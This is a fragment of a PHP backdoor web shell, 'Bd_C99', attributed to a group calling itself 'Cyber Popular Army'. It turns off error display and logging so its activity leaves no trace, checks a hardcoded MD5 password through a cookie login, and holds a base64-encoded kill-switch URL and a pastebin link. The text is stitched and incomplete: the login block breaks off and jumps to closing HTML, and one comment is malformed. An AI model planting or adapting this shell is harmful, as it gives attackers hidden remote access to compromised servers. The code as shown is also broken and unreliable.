<?phtml

 

/*

               Bd_C99 2.4

               Cyber Popular Army

               @Cyber_pop_army

               First part (1.o.2) of our backdoor code !! - (c) 2018

/*

 

error_reporting(0);

@set_time_limit(0);

@ini_set('display_errors','0');

@ini_set('html_errors','0');

@ini_set('log_errors','0');

@clearstatcache();

 

$s_name = "Bd_C99"; // CPA's Bdoor name

$s_ver = "2.0.1"; // shell ver

$s_title = $s_name." ".$s_ver; // shell title

$s_pass = "41ef90ae5f9577c1f8517b06b8e93333"; // shell password, fill with password in md5 format to protect shell, default : Armagedon

$s_killswitchURL = "aHR0cHM6Ly9jeWJlci1jaGFvcy5mci9rZWEvaW5kZXgucGhw"; // B64 safety Kill switch adress

$s_killswitchCode = "https://pastebin.com/x48sxbxB"; // Kill switch code adress

 

$s_auth = false; // login status

if(strlen(trim($s_pass))>0){

               if(isset($_COOKIE['Bd_C99'])){

                              if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE['Bd_C99']))) $s_auth = true;

               }

               if(isset($_REQUEST['login'])){

                              $login = strtolower(md5(trim($_REQUEST['login'])));

                              if(strtolower(trim($s_pass)) == $login){

                                            setcookie("Bd_C99",$login,time() + $s_login_time);

                                            $s_auth = true;

                              }

               }

               if(isset($_REQUEST['logout'])){

                              $reload = (isset($_COOKIE['Bd_C99_included']) && isset($_COOKIE['s_home']))? rtrim(urldecode($_COOKIE['s_self']),"&"):"";

                              foreach($_COOKIE as $k=>$v){

                                            setcookie($k,"",time() - $s_login_time);

                              }

                              $s_auth = false;

                              if(!empty($reload)) header("Location: ".$reload);

               }

 

<?php } ?>

</td></tr></table>

<p class='footer'>CybPopArmy_#CPA &copy;<?php echo @date("Y",time())." ".$s_name; ?></p>

</body>

</html><?php die(); ?>
